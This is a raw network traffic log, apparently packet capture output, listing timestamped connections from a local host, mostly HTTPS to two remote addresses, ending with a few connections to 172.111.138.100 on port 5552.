Dec 30, 2024 11:25:41.320050955 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.320059061 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.320082903 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.320121050 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.320153952 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.320172071 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.320230007 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.321125984 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.321135998 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.321649075 CET	49977	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.321666956 CET	443	49977	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.321727037 CET	49977	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.321985006 CET	49977	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.321995020 CET	443	49977	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.479854107 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.479896069 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.479940891 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.479969025 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.479976892 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.480005980 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.480062008 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.480062008 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.487385035 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.487406969 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.487826109 CET	49978	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.487876892 CET	443	49978	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.487943888 CET	49978	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.488121986 CET	49978	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.488132954 CET	443	49978	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.863596916 CET	49975	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.863622904 CET	49976	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.863658905 CET	49978	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.863691092 CET	49977	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:41.867257118 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.867285967 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.867336988 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.868645906 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.868685961 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.868735075 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.869057894 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.869067907 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.869180918 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.869199038 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.482791901 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.483026028 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.483663082 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.483773947 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.487742901 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.487749100 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.488044977 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.488635063 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.489336014 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.493026018 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.493181944 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.493777037 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.493870020 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.496243954 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.496254921 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.496495962 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.498599052 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.499453068 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.531327009 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.547341108 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.858316898 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.858555079 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.858575106 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.858742952 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.858757019 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.858802080 CET	443	49984	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.858880043 CET	49984	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.859529972 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.859570980 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.859582901 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:42.859603882 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.859688997 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.859704971 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.860157967 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.860181093 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:42.860196114 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.860209942 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.870929956 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.871131897 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.871336937 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.871372938 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.871505976 CET	443	49985	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.871519089 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.871615887 CET	49985	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.872282982 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.872312069 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:42.872523069 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.872522116 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.872565985 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:42.872728109 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.872972965 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:42.872975111 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:42.872987032 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:42.872989893 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.471575975 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.471683025 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.471714973 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.471775055 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.472214937 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.472255945 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.478188992 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.478288889 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.542475939 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.542614937 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.543302059 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.543370962 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.682791948 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.682835102 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.683217049 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.683290958 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.689388990 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.689412117 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.689671040 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.689698935 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.689800978 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.690406084 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.692982912 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.693017960 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.693279982 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.693348885 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.693881035 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:43.702218056 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.702239037 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.702601910 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.702714920 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.703049898 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.735327005 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.735337973 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.735347986 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:43.747338057 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.986068964 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.986171961 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.986807108 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.986851931 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.986859083 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.986861944 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.986896038 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.986923933 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.986934900 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.987996101 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.988863945 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.988919020 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:43.989027023 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:43.989113092 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.013891935 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.013936043 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.014029026 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.014054060 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.014143944 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.028954983 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.028969049 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.028980017 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.029016972 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.029736042 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.029759884 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.029810905 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.030065060 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.030076027 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.030112028 CET	49993	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.030133963 CET	443	49993	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.030757904 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.030781031 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.030894995 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.034300089 CET	49995	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.034315109 CET	443	49995	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.057065964 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.057094097 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.057157993 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.057439089 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.057460070 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.082987070 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.083012104 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.173293114 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.173357010 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.173434019 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.173466921 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.173481941 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.173527956 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.184681892 CET	49994	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.184715986 CET	443	49994	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.186163902 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.186208963 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.186477900 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.188724041 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.188743114 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.634639025 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.634696960 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.665360928 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.665426970 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.681802988 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.681813955 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.683005095 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.683043957 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.684343100 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.684401989 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.684690952 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.684696913 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.684820890 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:44.684849977 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:44.728693008 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.728708029 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.729022980 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.729027987 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.791620970 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.791682005 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.837548018 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.837584972 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:44.838005066 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:44.838017941 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.000119925 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.000256062 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.000269890 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.000338078 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.000386953 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.000420094 CET	443	50004	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.000472069 CET	50004	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.001302004 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.001346111 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.001432896 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.002660036 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.002676010 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.039769888 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.039845943 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.039902925 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.039953947 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.040278912 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.040322065 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.040328026 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.040369987 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.044368982 CET	50005	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.044415951 CET	443	50005	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.045147896 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.045160055 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.045233011 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.045660973 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.045672894 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.102649927 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.102705956 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.102710009 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.102746964 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.102761984 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.102781057 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.102788925 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.102806091 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.102823019 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.102847099 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.116525888 CET	50006	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.116556883 CET	443	50006	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.117022991 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.117053032 CET	443	50020	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.117110968 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.117305994 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.117322922 CET	443	50020	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.258955956 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.259006023 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.259016037 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.259052038 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.259095907 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.259124994 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.259131908 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.259177923 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.260123968 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.260173082 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.260178089 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.260225058 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.266266108 CET	50012	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.266283989 CET	443	50012	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.267617941 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.267644882 CET	443	50021	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.267940044 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.267940044 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.267965078 CET	443	50021	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.600819111 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.600975037 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.601599932 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.602297068 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.603969097 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.603982925 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.604247093 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.604338884 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.604837894 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.643968105 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.644077063 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.644737959 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.644890070 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.646692991 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.646708012 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.646975994 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.647133112 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.647336960 CET	443	50018	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.647578955 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.691333055 CET	443	50019	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.717170000 CET	443	50020	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.717278004 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.718606949 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.718622923 CET	443	50020	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.731256962 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.731288910 CET	443	50020	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.875988960 CET	443	50021	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.876298904 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.876298904 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.876358986 CET	443	50021	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.876384020 CET	50018	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.876384020 CET	50019	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.876391888 CET	50020	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.876487017 CET	443	50021	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:45.876512051 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.876769066 CET	50021	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:45.877990961 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.878017902 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.879160881 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.879182100 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.879215956 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.879282951 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.879726887 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.879730940 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:45.879736900 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:45.879744053 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.476516008 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.476617098 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.487250090 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.487338066 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.514663935 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.514682055 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.517420053 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.517426968 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.518987894 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.518996000 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.519217968 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.519223928 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.719219923 CET	50030	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:46.724122047 CET	5552	50030	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:46.728075981 CET	50030	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:46.738542080 CET	50030	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:46.743416071 CET	5552	50030	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:46.839536905 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.839623928 CET	50027	443	192.168.2.10	216.58.206.46
